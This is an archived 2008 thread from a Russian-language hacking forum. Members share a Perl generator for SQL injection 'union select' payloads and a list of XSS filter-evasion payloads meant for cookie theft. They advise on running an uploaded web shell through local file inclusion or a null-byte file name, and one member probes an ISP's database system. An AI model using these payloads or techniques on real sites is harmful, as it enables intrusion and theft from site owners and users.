ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.01.2008, 14:50
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
чтоб не писать в ручную все колонки, скрипт забацал на вывод цифры и запятой до 146 штук
давно какт о тоже нопесал
Код:
#!/usr/bin/perl
while (1) {
print "\n\nNumber of columns\n";
$id = <STDIN>;
chomp ($id);
$x = 1;
print "-1+union+select+";
while ($x < $id) {
print "$x,";
$x++;
}
if ($x = $id) {
print "$x/*";
}
}
|
|
|

28.01.2008, 15:13
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме: 3660186
Репутация:
905
|
|
При проведении xss-кражи куков тебе возможно и не потребуются эти символы. Или тебе прямо обязательно нужен alert(99)?
Нет, необязателен алерт  Но, например,
Код:
var i=new Image();
...
уже не прокатит. Да и уязвимость в тэге a - есть желание запихать ксс в style, где юзается url() - также со скобками
|
|
|

28.01.2008, 15:21
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
1)принудительно закрыть тег <a> и прописать <script>...</script>
2)
Код:
<a href="javascript:alert('XSS')">click</a>
Код:
=decoded=
<a href="javascript:alert('XSS')"></a>
Последний раз редактировалось AFoST; 28.01.2008 в 15:24..
|
|
|

28.01.2008, 15:37
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
Вот ещё несколько вариантов
Код:
<a href="j\;a\;v\;a\;s\;c\;r\;i\;p\;t\;:\;a\;l\;e\;r\;t\;(\;'\;X\;S\;S\;'\;)\;">click</a>
<a href="javascript:alert('XSS')">click</a>
<a href="javascript:alert('XSS')">click</a>
<a href="javascript:alert(xss)">click</a>
<a href="javascript:alert(\;xss)\;">click</a>
<A HREF="http://66.102.7.147/">click</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
все "\;" заменить на ;
Последний раз редактировалось AFoST; 28.01.2008 в 15:41..
|
|
|

28.01.2008, 15:53
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме: 3660186
Репутация:
905
|
|
Сенкс за наводку, попробую, но сразу скажу, там обрабатываются таким же образом и амперсанд, и кавычка, и апостроф (обратный апостроф не фильтруется)
|
|
|

28.01.2008, 19:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Я загрузил на сервер шелл с именем img.php.gif
но сервер загрузил как img.php.1201468364.gif
каким образом мне запустить шелл?
__________________
BlackHat. MoDL
|
|
|

28.01.2008, 19:58
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме: 13395217
Репутация:
2097
|
|
Ищи на сайте локальный инлкуд и инклудь свой шелл
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|

28.01.2008, 20:19
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме: 2030482
Репутация:
1796
|
|
Сообщение от Dimi4
Я загрузил на сервер шелл с именем img.php.gif
но сервер загрузил как img.php.1201468364.gif
каким образом мне запустить шелл?
Попробуй загрузить кратинку с именем img.php%00.gif
Вероятность мала но все же есть что твой файл чудесным образом превратиться на сервере в img.php
__________________
Кто я?..
|
|
|

28.01.2008, 20:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Попробуй загрузить кратинку с именем img.php%00.gif
Вероятность мала но все же есть что твой файл чудесным образом превратиться на сервере в img.php
Непрошло..
Кста стоит тама e107
я юзал вот ето
_http://milw0rm.com/exploits/4099
__________________
BlackHat. MoDL
|
|
|

29.01.2008, 17:28
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
Привет.У меня есть вопрос...
мой провайдер (raid.ru) использует какуюто особую программ
для работы пользователя с бд Programm ppo.c version 1.7
смог выжать конфиг в котором как понял прописаны все бд /var/www/db.raid.ru/cgi-bin/ora_agent.cfg
запросы формируются странным образом
https://db.raid.ru/cgi-bin/ppo/es_webface/point_access.services
es_webface название бд как я понял
point_access -хз
services -действие
если кто что знает подскажите...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|